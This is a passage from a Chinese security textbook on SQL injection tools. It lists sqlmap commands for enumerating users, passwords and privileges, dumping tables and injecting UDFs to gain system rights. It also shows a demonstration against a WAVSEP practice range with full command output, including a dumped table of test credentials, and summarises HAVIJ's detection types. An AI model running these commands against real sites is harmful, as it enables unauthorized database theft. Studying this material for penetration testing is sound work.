4.2.3 SQL常见工具

1.sqlmap

sqlmap是一款用来检测与利用SQL注入漏洞的免费开源工具,它有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。读者可以通过位于SourceForge的官方网站下载sqlmap源码(见图4-10):http://sourceforge.net/projects/sqlmap/

图4-10 sqlmap界面图

也可以使用git来获取:


git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

sqlmap常见命令:


sqlmap -u "http://url/news?Id=1" –dbms "mysql" –users # dbms 指定数据库类型
sqlmap -u "http://url/news?Id=1" –users #列数据库用户
sqlmap -u "http://url/news?Id=1" –dbs#列数据库
sqlmap -u "http://url/news?Id=1" –passwords #数据库用户密码
sqlmap -u "http://url/news?Id=1" –passwords-u root -v 0 #列出指定用户数据库密码
sqlmap -u "http://url/news?Id=1" –dump  -c  "password,user,id"  -t "tablename"-d "db_name"–start 1 –stop 20 #列出指定字段,列出20 条
Sqlmap -u "http://url/news?Id=1" –dump-all -v 0 #列出所有数据库所有表
sqlmap -u "http://url/news?Id=1" –privileges #查看权限
sqlmap -u "http://url/news?Id=1" –privileges -u root #查看指定用户权限
sqlmap -u "http://url/news?Id=1" –is-dba -v 1 #是否是数据库管理员
sqlmap -u "http://url/news?Id=1" –roles #枚举数据库用户角色
sqlmap -u "http://url/news?Id=1" –udf-inject #导入用户自定义函数(获取 系统权限!)
Sqlmap -u "http://url/news?Id=1" –dump-all –exclude-sysdbs -v 0 #列 出当前库所有表
sqlmap -u "http://url/news?Id=1" –union-cols #union 查询表记录
sqlmap -u "http://url/news?Id=1" –cookie "cookie_value"#cookie注入
sqlmap -u "http://url/news?Id=1" -b #获取banner信息
sqlmap -u "http://url/news?Id=1" –data "id=3″#post注入
sqlmap -u "http://url/news?Id=1" -v 1 -f #指纹判别数据库类型

以WAVSEP靶场为例演示sqlmap强大功能。存在SQL注入漏洞的链接为:


http://182.61.11.23:8080/wavsep/active/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=textvalue&password=textvalue2

其中注入点是username字段。

·获取数据库类型:


./sqlmap.py -u "http://182.61.11.23:8080/wavsep/active/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=textvalue&password=textvalue2" -p username

返回结果:


[10:45:03] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL >= 5.0
[10:45:03] [INFO] fetched data logged to text files under '/Users/liu.yan/.sqlmap/output/182.61.11.23'

·获取数据库用户列表:


./sqlmap.py -u "http://182.61.11.23:8080/wavsep/active/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=textvalue&password=textvalue2" -p username --users

返回结果:


database management system users [1]:
[*] 'wavsep'@'localhost'

[10:51:26] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 4 times
[10:51:26] [INFO] fetched data logged to text files under '/Users/liu.yan/.sqlmap/output/182.61.11.23'

[*] shutting down at 10:51:26

·获取数据库列表:


./sqlmap.py -u "http://182.61.11.23:8080/wavsep/active/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=textvalue&password=textvalue2" -p username --dbs

返回结果:


[10:54:51] [INFO] fetching database names
[10:54:52] [INFO] the SQL query used returns 2 entries
[10:54:52] [INFO] retrieved: information_schema
[10:54:52] [INFO] retrieved: wavsepDB
available databases [2]:
[*] information_schema
[*] wavsepDB

·获取指定数据库指定表的全部数据:


./sqlmap.py -u "http://182.61.11.23:8080/wavsep/active/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=textvalue&password=textvalue2" -p username -D wavsepDB -T users --dump

返回结果:


Database: wavsepDB
Table: users
[7 entries]
+--------+----------+------------+-----------+
| userid | username | password   | privilege |
+--------+----------+------------+-----------+
| 1      | user1    | password   | 1         |
| 2      | david    | goodboy    | 1         |
| 3      | admin    | mastermold | 5         |
| 4      | user4    | password4  | 1         |
| 5      | user5    | password5  | 2         |
| 6      | user6    | password6  | 1         |
| 7      | user7    | password7  | 1         |
+--------+----------+------------+-----------+

[11:10:05] [INFO] table 'wavsepDB.users' dumped to CSV file '/Users/liu.yan/.sqlmap/output/182.61.11.23/dump/wavsepDB/users.csv'
[11:10:05] [INFO] fetched data logged to text files under '/Users/liu.yan/.sqlmap/output/182.61.11.23'

[*] shutting down at 11:10:05

·获取指定数据库的全部数据:


./sqlmap.py -u "http://182.61.11.23:8080/wavsep/active/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=textvalue&password=textvalue2" -p username -D wavsepDB --dump-all -v 0

返回结果:


[11:05:30] [INFO] resumed: 8
Database: wavsepDB
Table: transactions
[8 entries]
+--------+---------------+-------+-----------------------+-----------------+
| userid | transactionId | sum   | description           | transactionDate |
+--------+---------------+-------+-----------------------+-----------------+
| 1      | 132           | 1000  | Simple Transaction    | 2010-01-01      |
| 2      | 133           | 1200  | Simple Transaction    | 2010-01-01      |
| 3      | 135           | 3000  | Simple Transaction    | 2010-01-01      |
| 4      | 223           | 4000  | Simple Transaction    | 2010-01-01      |
| 5      | 423           | 5000  | Simple Transaction    | 2010-01-01      |
| 6      | 456           | 6000  | Simple Transaction    | 2010-01-01      |
| 7      | 789           | 7012  | Expensive Transaction | 2010-01-01      |
| 8      | 895           | 8000  | Expensive Transaction | 2010-02-02      |
+--------+---------------+-------+-----------------------+-----------------+

[*] shutting down at 11:05:30

2.HAVIJ

HAVIJ是一款自动化的SQL注入工具,其界面见图4-11,它能够帮助渗透测试人员发现和利用Web应用程序的SQL注入漏洞。

图4-11 HAVIJ界面图

支持的检测类型包括:

·MSSQL 2000/2005 with error;

·MSSQL 2000/2005 no-error union-based;

·MSSQL blind;

·MSSQL time-based;

·MySQL union-based;

·MySQL blind;

·MySQL error-based;

·MySQL time-based;

·Oracle union-based;

·Oracle error-based;

·Oracle blind;

·PostgreSQL union-based;

·MS Access union-based;

·MS Access blind;

·Sybase(ASE);

·Sybase(ASE)Blind。